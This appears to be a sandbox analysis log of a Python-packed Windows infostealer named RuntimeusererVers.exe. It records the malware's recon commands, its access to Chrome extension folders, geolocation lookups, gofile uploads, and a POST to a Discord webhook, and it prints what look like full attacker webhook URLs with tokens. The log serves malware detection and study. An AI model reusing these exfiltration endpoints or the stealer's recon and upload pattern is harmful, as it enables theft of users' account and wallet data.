                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe, ReversingLabs: Detection: 39%
                      Source: RuntimeusererVers.exe, ReversingLabs: Detection: 39%
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability

                      Location Tracking

                      Source: unknown, DNS query: name: geolocation-db.com

                      Phishing

                      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net user administrator
                      Source: C:\Windows\System32\net.exe, Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: RuntimeusererVers.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                      Spreading

                      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\ARP.EXE arp -a
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0

                      Networking

                      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                      Source: Yara match, File source: Process Memory Space: RuntimeusererVers.exe PID: 8168, type: MEMORYSTR
                      Source: unknown, DNS query: name: ip-api.com
                      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic, HTTP traffic detected: GET /json HTTP/1.1 | Accept-Encoding: identity | Host: geolocation-db.com | User-Agent: Python-urllib/3.11 | Connection: close
                      Source: global traffic, HTTP traffic detected: GET /json/ HTTP/1.1 | Accept-Encoding: identity | Host: geolocation-db.com | User-Agent: Python-urllib/3.11 | Connection: close
                      Source: global traffic, HTTP traffic detected: GET /getServer HTTP/1.1 | Host: api.gofile.io | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Python/3.11 aiohttp/3.8.4
                      Source: global traffic, HTTP traffic detected: GET /json HTTP/1.1 | Host: ip-api.com | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Python/3.11 aiohttp/3.8.4
                      Source: global traffic, DNS traffic detected: DNS query: geolocation-db.com
                      Source: global traffic, DNS traffic detected: DNS query: discord.com
                      Source: global traffic, DNS traffic detected: DNS query: ip-api.com
                      Source: global traffic, DNS traffic detected: DNS query: api.gofile.io
                      Source: global traffic, DNS traffic detected: DNS query: store1.gofile.io
                      Source: unknown, HTTP traffic detected: POST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1 | Host: discord.com | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Python/3.11 aiohttp/3.8.4 | Content-Length: 62 | Content-Type: application/json
                      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.27.1 | Date: Fri, 15 Nov 2024 09:46:47 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 14 | Connection: close | Access-Control-Allow-Origin: * | Access-Control-Allow-Headers: Content-Type, Authorization | Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD | Access-Control-Allow-Credentials: true | Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests | Cross-Origin-Embedder-Policy: require-corp | Cross-Origin-Opener-Policy: same-origin | Cross-Origin-Resource-Policy: cross-origin | Origin-Agent-Cluster: ?1 | Referrer-Policy: no-referrer | Strict-Transport-Security: max-age=15552000; includeSubDomains | X-Content-Type-Options: nosniff | X-DNS-Prefetch-Control: off | X-Download-Options: noopen | X-Frame-Options: SAMEORIGIN | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 0 | ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/4686538b-da3c-416e-bc82-f71b09908cb0.pnguPRIME:uBITS:aTwtichAccountsu
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/53ad50f6-06dc-4aa1-9677-ca47ce96abe2.png
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/53ad50f6-06dc-4aa1-9677-ca47ce96abe2.pngw
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/5a843d2c-f5f9-41e1-9932-8fa37b79cf7d.jpg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/5a843d2c-f5f9-41e1-9932-8fa37b79cf7d.jpguPHONE:uCOINS:uhttps://tiktok.c
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/84415d69-e663-4ba9-9112-fb2e1b80a759.jpg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/84415d69-e663-4ba9-9112-fb2e1b80a759.jpguCREATION
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/ce81ee9c-b6c5-47d3-951f-7f047071e457.jpg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/ce81ee9c-b6c5-47d3-951f-7f047071e457.jpguREAL
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/db20c25b-e92b-47b6-a294-c2db0e5b6e9d.jpg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.nest.rip/uploads/db20c25b-e92b-47b6-a294-c2db0e5b6e9d.jpgu
                      Source: RuntimeusererVers.exeString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
                      Source: RuntimeusererVers.exe, 00000003.00000003.1667928239.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1420294470.0000022335196000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717994360.0000022335188000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1669198355.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1648622407.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1719006635.000002233518E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoX
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/hazmat/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5246#section-7.4.1.4.1
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/users/
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQm
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1306736843919720519/a6GMvyeHGrq2cYOdvcvhhPxsGXTVCcimUVVnrskCkBN5qaN
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.7/library/asyncio-eventloop.html
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSION
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSIONaset_default_verify_pathsuSSL
                      Source: RuntimeusererVers.exe, 00000003.00000003.1667928239.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1420294470.0000022335196000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717994360.0000022335188000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1669198355.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1648622407.000002233518F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1719006635.000002233518E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.cJ
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filepreviews.io/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233426A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539#
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/json
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonacountry_codeaIPv4D
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233426A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/zstd/blob/dev/lib/zstd.h).
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kjd/idna
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/pyright/)).
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/bcrypt/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/bcrypt/a__uri__u4.0.1a__version__uThe
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1068)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1079)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1081)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1084)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1085)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1090)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1092)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1099)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1105)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1107)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1117)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1120)
